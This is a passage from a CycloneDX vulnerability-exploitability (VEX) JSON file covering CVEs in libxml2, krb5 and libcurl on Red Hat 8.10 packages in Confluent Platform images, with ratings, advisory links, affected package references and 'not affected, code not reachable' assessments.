          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11850",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        191
      ],
      "description": "An integer underflow vulnerability was found in MIT krb5 in the berval2tl_data() function in plugins/kdb/ldap/libkdb_ldap/ldap_principal2.c. The function performs an unsigned subtraction (bv_len - 2) without a prior bounds check. When bv_len is 0 or 1, the subtraction wraps to a large value which is then truncated to uint16_t, yielding 0xFFFE (65534) or 0xFFFF (65535). The subsequent malloc succeeds and memcpy reads up to 65534 bytes from a 0-1 byte buffer, resulting in a heap out-of-bounds read.\nThe attack vector involves a malicious or compromised LDAP KDB backend returning a krbExtraData attribute with bv_len < 2, triggering the underflow when the KDC or kadmind reads principal data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11850"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25520"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11850"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2459970"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11850"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8585-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11850"
        }
      ],
      "published": "2026-06-11T10:16:21+00:00",
      "updated": "2026-06-17T10:14:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18.2-34.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18.2-34.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18.2-34.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11856",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer to a specific HTTP origin\n(`hostA`) with **Digest** authentication and then changing the origin to a\ndifferent one (`hostB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the  `Authorization:` header field meant for `hostA`,\nto `hostB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11856"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11856"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9crq-qh8v-6xmm"
        },
        {
          "url": "https://hackerone.com/reports/3793260"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11856"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11856"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T19:43:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11940",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
